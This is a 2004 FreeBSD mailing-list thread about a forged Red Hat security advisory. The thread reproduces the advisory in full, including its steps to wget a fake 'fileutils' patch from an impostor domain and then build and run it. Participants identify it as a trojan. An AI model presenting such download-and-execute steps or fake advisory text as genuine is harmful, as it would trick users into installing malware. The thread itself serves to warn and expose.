Re: RedHat: Buffer Overflow in ls and mkdir
On Sun, 24 Oct 2004, Thomas Sparrevohn wrote: On Sunday 24 October 2004 23:00, FreeBSD questions mailing list wrote: On 24 okt 2004, at 23:57, RedHat Security Team wrote: Dear RedHat user, huh? I thought I ran FreeBSD... I guess so did I - not really sure that there are any relevance... The domain hosting the files was registered yesterday. Anyone with half an eye open would spot the attempt at installing malicious software on a bunch of redhat machines. I haven't looked at the actual files, but that's what it looks like to me. Best regards, -- -Jonas P.S. worst part is that I am sure someone falls for things like these. ___ [EMAIL PROTECTED] mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: RedHat: Buffer Overflow in ls and mkdir
On Sun, 24 Oct 2004, Matt Navarre wrote: Isn't linux_base based on RedHat? There are ls and mkdir binaries in /usr/compat/linux/bin, I suppose those could be affected by this. Over on Full-Disclosure they reckon it's a trojan, as it's unsigned and not in the usual format for such announcements. -- Dave ___ [EMAIL PROTECTED] mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: RedHat: Buffer Overflow in ls and mkdir
On Monday 25 October 2004 12:07, Dave Horsfall wrote: On Sun, 24 Oct 2004, Matt Navarre wrote: Isn't linux_base based on RedHat? There are ls and mkdir binaries in /usr/compat/linux/bin, I suppose those could be affected by this. Over on Full-Disclosure they reckon it's a trojan, as it's unsigned and not in the usual format for such announcements. Yeah, it is. http://www.redhat.com/security/ -- Dave ___ [EMAIL PROTECTED] mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED] -- We all enter this world in the same way: naked, screaming, and soaked in blood. But if you live your life right, that kind of thing doesn't have to stop there. -- Dana Gould ___ [EMAIL PROTECTED] mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: RedHat: Buffer Overflow in ls and mkdir
On Monday 25 October 2004 12:07, Dave Horsfall wrote: On Sun, 24 Oct 2004, Matt Navarre wrote: Isn't linux_base based on RedHat? There are ls and mkdir binaries in /usr/compat/linux/bin, I suppose those could be affected by this. Over on Full-Disclosure they reckon it's a trojan, as it's unsigned and not in the usual format for such announcements. Yeah, it is. http://www.redhat.com/security/ Actuallly, it's not. According to the RedHat page you cite above, security alerts are sent by: [EMAIL PROTECTED] The From: line in the bogus message is: From: RedHat Security Team [EMAIL PROTECTED] Apparently, the sender couldn't be bothered to get it right. Don ___ [EMAIL PROTECTED] mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
RedHat: Buffer Overflow in ls and mkdir
[logo_rh_home.png] Original issue date: October 20, 2004 Last revised: October 20, 2004 Source: RedHat A complete revision history is at the end of this file. Dear RedHat user, Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected. The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps: * First download the patch from the Security RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz * cd fileutils-1.0.6.patch * make * ./inst Again, please apply this patch as soon as possible or you risk your system and others` to be compromised. Thank you for your prompt attention to this serious matter, RedHat Security Team. Copyright © 2004 Red Hat, Inc. All rights reserved. ___ [EMAIL PROTECTED] mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: RedHat: Buffer Overflow in ls and mkdir
On 24 okt 2004, at 23:57, RedHat Security Team wrote: [logo_rh_home.png] Original issue date: October 20, 2004 Last revised: October 20, 2004 Source: RedHat A complete revision history is at the end of this file. Dear RedHat user, huh? I thought I ran FreeBSD... ___ [EMAIL PROTECTED] mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: RedHat: Buffer Overflow in ls and mkdir
On Sunday 24 October 2004 23:00, FreeBSD questions mailing list wrote: On 24 okt 2004, at 23:57, RedHat Security Team wrote: [logo_rh_home.png] Original issue date: October 20, 2004 Last revised: October 20, 2004 Source: RedHat A complete revision history is at the end of this file. Dear RedHat user, huh? I thought I ran FreeBSD... I guess so did I - not really sure that there are any relevance... ___ [EMAIL PROTECTED] mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: RedHat: Buffer Overflow in ls and mkdir
Thomas Sparrevohn wrote: On Sunday 24 October 2004 23:00, FreeBSD questions mailing list wrote: On 24 okt 2004, at 23:57, RedHat Security Team wrote: [logo_rh_home.png] Original issue date: October 20, 2004 Last revised: October 20, 2004 Source: RedHat A complete revision history is at the end of this file. Dear RedHat user, huh? I thought I ran FreeBSD... I guess so did I - not really sure that there are any relevance... Isn't linux_base based on RedHat? There are ls and mkdir binaries in /usr/compat/linux/bin, I suppose those could be affected by this. ___ [EMAIL PROTECTED] mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED] -- We all enter this world in the same way: naked, screaming, and soaked in blood. But if you live your life right, that kind of thing doesn't have to stop there. -- Dana Gould ___ [EMAIL PROTECTED] mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: RedHat: Buffer Overflow in ls and mkdir
begin quotation of FreeBSD questions mailing list on 2004-10-25 00:00:56 +0200: On 24 okt 2004, at 23:57, RedHat Security Team wrote: snip Dear RedHat user, huh? I thought I ran FreeBSD... This fake security notice references the GNU fileutils, which are now called coreutils and are included in the ports collection. /usr/ports/sysutils/coreutils signature.asc Description: Digital signature
Re: RedHat: Buffer Overflow in 'ls' and 'mkdir'
This is a fake! DONT download the patch (linux users), it is a trojaned version. Check: http://www.linux.ie/pipermail/ilug/2004-October/019483.html [logo_rh_home.png] Original issue date: October 20, 2004 Last revised: October 20, 2004 Source: RedHat A complete revision history is at the end of this file. Dear RedHat user, Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected. The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps: * First download the patch from the Security RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz * cd fileutils-1.0.6.patch * make * ./inst Again, please apply this patch as soon as possible or you risk your system and others` to be compromised. Thank you for your prompt attention to this serious matter, RedHat Security Team. Copyright © 2004 Red Hat, Inc. All rights reserved. ___ [EMAIL PROTECTED] mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED] -- www.6s-gaming.com ___ [EMAIL PROTECTED] mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: RedHat: Buffer Overflow in 'ls' and 'mkdir'
Hugo Silva wrote: This is a fake! DONT download the patch (linux users), it is a trojaned version. Check: http://www.linux.ie/pipermail/ilug/2004-October/019483.html A complete revision history is at the end of this file. Dear RedHat user, Above pipermail tracked down the source location. Is s/he now operating from a different location? The given webpage still exists, and when I dig its location, I get: ; DiG 8.3 www.fedora-redhat.com ;; res options: init recurs defnam dnsrch ;; got answer: ;; -HEADER- opcode: QUERY, status: NOERROR, id: 25565 ;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 11, ADDITIONAL: 9 ;; QUERY SECTION: ;; www.fedora-redhat.com, type = A, class = IN ;; ANSWER SECTION: www.fedora-redhat.com. 8m16s IN CNAME premium4.geo.yahoo.akadns.net. premium4.geo.yahoo.akadns.net. 3m16s IN A 66.218.79.155 premium4.geo.yahoo.akadns.net. 3m16s IN A 66.218.79.147 premium4.geo.yahoo.akadns.net. 3m16s IN A 66.218.79.148 premium4.geo.yahoo.akadns.net. 3m16s IN A 66.218.79.149 ;; AUTHORITY SECTION: akadns.net. 1d3h21m5s IN NS asia3.akam.net. akadns.net. 1d3h21m5s IN NS eur3.akam.net. akadns.net. 1d3h21m5s IN NS use2.akam.net. akadns.net. 1d3h21m5s IN NS use4.akam.net. akadns.net. 1d3h21m5s IN NS usw5.akam.net. akadns.net. 1d3h21m5s IN NS usw6.akam.net. akadns.net. 1d3h21m5s IN NS usw7.akam.net. akadns.net. 1d3h21m5s IN NS za.akadns.org. akadns.net. 1d3h21m5s IN NS zc.akadns.org. akadns.net. 1d3h21m5s IN NS zf.akadns.org. akadns.net. 1d3h21m5s IN NS zh.akadns.org. ;; ADDITIONAL SECTION: asia3.akam.net. 3h57m1s IN A193.108.154.9 eur3.akam.net. 9m13s IN A 193.45.1.103 use2.akam.net. 9m13s IN A 63.209.170.136 use4.akam.net. 9m12s IN A 80.67.67.182 usw5.akam.net. 9m12s IN A 63.241.73.214 usw6.akam.net. 9m13s IN A 206.132.100.108 usw7.akam.net. 9m13s IN A 65.203.234.27 za.akadns.org. 41m53s IN A 208.185.132.176 zc.akadns.org. 41m53s IN A 63.241.199.54 R. ___ [EMAIL PROTECTED] mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
